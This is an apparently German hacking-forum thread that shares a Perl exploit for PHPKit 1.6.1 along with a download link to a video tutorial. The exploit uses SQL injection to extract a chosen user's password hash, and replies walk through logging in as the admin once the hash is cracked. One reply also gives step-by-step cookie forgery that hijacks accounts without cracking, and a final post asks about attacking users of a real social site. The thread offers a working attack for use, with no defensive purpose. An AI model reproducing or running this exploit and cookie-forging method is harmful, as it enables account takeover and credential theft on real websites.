-
[B] PHPKit 1.6.1 Exploit
HI @ all,
habe mal aus Langeweile ein V-Tut gemacht wie man die PHPKit 1.6.1 Exploit anwendet.
http://rapidshare.com/files/66305113/PHPKIT_1.6.1.rar
pw: free-hack
Hier nochmal die Exploit:
Code:
#!/usr/bin/perl
use IO::Socket;
print q{
-----------------------------------------------
PHPKit 1.6.1 exploit by x23 ~ phcn.ws ~ geek-network.de
use: phpkit161.pl [server] [dir] [vic_id]
sample:
$ perl phpkit161.pl localhost /phpkit/ 1
-----------------------------------------------
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
$vic_id = $ARGV[2];
if (!$vic_id) { die "~ read how to use ;)\n"; }
print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "POST ".$directory."popup.php?path=misc/finduser.php HTTP/1.1\r\n";
print $sock "Host: $webpage\r\n";
print $sock "Keep-Alive: 300\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length("search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1")."\r\n\r\n";
print $sock "search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1";
while ($answer = <$sock>) {
#print $answer;
if ($answer =~/<option value="([0-9a-f]{32})">/) {
print "~ hash: $1\n";
close($sock);
exit();
break;
}
}
close($sock);
# milw0rm.com [2006-11-04]
mfg
abcdef
-
bei mir zeigt der an
! C:\Dokumente und Einstellungen\Eugen\Desktop\PHPKIT_1.6.1.rar: CRC-Fehler in der verschlüsselten Datei PHPKIT_1.6.1..avi (Falsches Passwort ?)
-
das Passwort ist free-hack ohne .com
Feedback:
- geile musik ^^
- du hättest alle parameter erklären können
-
o.O. sry für das pw
nächstes mal erklär ich es genauer ;)
mfg
abcdef
-
ja super -.-und was mache ich dann nachdem man den hash entschlüsselt hat? und ohne das wie das mim entschlüsseln geht bringt das nit viel...
man hötte wenigsten noch beschreiben können die nächsten schritte
-
Wenn du den Hash entschlüsselt hast, schaust du wie wie der 1 User heißt ( wenn du bei der Exploit einen andern User genommen hast, musst du natürlich den anderen User suchen. Und dann musst du dich einfach einloggen. Dannach kannst du aufs Webinterface etc. zugreifen, aber nur mit der Vorraussetzung, du hast das Passwort vom Admin geknackt.
__________________________________________________ ____
Beispiel:
1 User: Keule
2 User: Paddy
3 User: Hommy
du hast das Passwort von Keule rausgefunden es ist 123456.
Dann musst du dich einloggen.
Login: Keule
Passwort: 123456
__________________________________________________ ____
mfg
abcdef
-
JO geil habe alles verstanden nice TUT das nächste mal vllt mit deiner sexy stimme-.-
mfg
Kingartur
-
schönes tut, jetzt werde ich mal ein wenig ergänzen, aber in textform. mir viel auf das bei neulingen noch fragen offen bleiben könnten die ich an dieser stelle beantworten möchte:
1. was tun wenn das phpkit garnicht in einem unterordner ist, was gibt man jetzt bei DIR ein??
Antwort: ganz einfach, man gibt /./ ein, der punkt steht für das aktuelle verzeichnis.
###########################
2. was tun wenn man den hash nich gecrackt bekommt??
Antwort: stickwort cookie faken. man benötigt dazu das firefox add-on live http headers (man kann natürlcih die cookies in der datei modifizieren aber ich finde es so komfortabler)... wenn man nicht eingeloggt ist könnte der cookie folgendermaße aussehen:
Code:
user_id=0; user_name=Gast; user_pw=b462dacd430fe56780b2b9a73e589330; PHPKITSID=22e717d7b10fb0f357d4c5363fa470fb; pkSITE=a%3A1%3A%7Bi%3A0%3Bi%3A1193958000%3B%7D
beispiel ist die seite aus dem tut. wir löschen phpkitsid komplett raus, tragen bei user_pw den hash ein, bei user_name den usernamen und bei user_id die id die wir auch beim exploit verwendet haben. modifiziert kann der cookie so aussehen:
Code:
user_id=1; user_name=Nightmage; user_pw=e5dafb64135ad68c1024a4cf1fc8b70c; pkSITE=a%3A1%3A%7Bi%3A0%3Bi%3A1193958000%3B%7D
So nun noch ab die post mit einem klick auf wiederholen und wir sind tatsächlich eingeloggt!
-
ist es auch möglich bestimmte user bei www.wer-kennt-wen.de
zu hashen =) ¿
-
Das ist aber kein PHP-Kit.
Ich habe jetzt auch keine Ahnung was das ist.
mfg
abcdef